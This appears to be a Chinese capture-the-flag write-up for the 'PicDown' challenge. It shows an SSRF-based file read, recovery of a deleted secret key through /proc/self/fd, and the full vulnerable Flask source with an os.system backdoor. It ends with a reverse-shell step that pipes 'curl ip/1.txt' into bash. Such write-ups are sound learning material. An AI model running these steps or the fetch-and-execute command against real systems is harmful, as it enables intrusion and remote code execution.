[网鼎杯 2020 白虎组]PicDown

只有一个输入框。输入后会有 url==???

猜测是ssrf了。但是进一步测试发现题目是python环境,所以尝试用local-file读

发现也不太行。然后尝试了半天,直接用///读取

主文件是app.py

直接读

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib
 
app = Flask(__name__)
 
SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)
 
 
@app.route('/')
def index():
    return render_template('search.html')
 
 
@app.route('/page')
def page():
    url = request.args.get("url")
    try:
        if not url.lower().startswith("file"):
            res = urllib.urlopen(url)
            value = res.read()
            response = Response(value, mimetype='application/octet-stream')
            response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
            return response
        else:
            value = "HACK ERROR!"
    except:
        value = "SOMETHING WRONG!"
    return render_template('search.html', res=value)
 
 
@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"
 
    return res
 
 
if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)

发现打开了secret.txt然后删除,得到secret中的key。因为打开过这个文件,所以可以通过proc/self/fd来找到这个文件,测试到在/proc/self/fd/3

key:Nwrqqhn1Y2yG4wP4QkvVkWLt2O82/nTreGHMXo8EH+0=

在/no_one_know_the_manager页面下输入key然后尝试反弹shell

因为直接用bash命令反弹不回来 所以我们用curl ip/1.txt |bash

拿到shell直接读取flag

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

Protected with IP Blacklist CloudIP Blacklist Cloud